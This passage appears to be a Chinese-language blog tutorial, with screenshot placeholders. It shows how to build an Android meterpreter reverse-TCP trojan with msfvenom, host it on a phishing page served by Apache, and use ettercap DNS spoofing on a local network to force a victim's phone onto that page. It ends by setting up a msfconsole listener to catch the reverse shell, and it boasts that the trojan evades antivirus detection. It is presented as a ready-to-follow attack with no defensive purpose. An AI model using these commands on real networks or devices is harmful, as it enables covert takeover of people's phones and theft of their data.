msfvenom -p android/meterpreter/reverse_tcp LHOST=kali本机ip LPORT=监听端口 R > /放置的目录/文件名.apk
第二步制作钓鱼网页
在这里我已经简单的准备了一个页面 代码如下
2.png
将生成的木马和编写页面放置到
/var/www/html/
目录下
3.png
然后启动
Apache2
systemctl start apache2
第三步开启DNS劫持
*编辑ettercap的DNS文件
nano /etc/ettercap/etter.dns
4.png
*启动ettercap
ettercap -G
5.png
*操作步骤
6.png
在弹出的窗口选择自己的网卡然后扫描内网IP
7.png
选择网关 add to target 1 选择目标 add to target 2
8.png
点击图中的菜单在之后弹出的选项中选择第一个然后确定
9.png
10.png
然后我们开启攻击
11.png
开启攻击后我们打开插件双击
dns_spoof
进行
DNS
毒化操作
手机端状态
此时我们手机端无法联网,访问任何网页都是我们实现安排好的页面效果如下
13.jpg
可以看到木马是没有报毒的,至少在MIUI11下是没有提示有病毒,并且申请了很多的权限。
启动木马监听等待目标上线
我们在终端启动
msfconsole
依次执行:
use exploit/multi/handler set payload android/meterpreter/reverse_tcp set LHOST 192.168.123.10 //kali 本机的ip set LPORT 9055 //监听上线的端口 需要与生成木马的时候填写一样 exploit //执行监听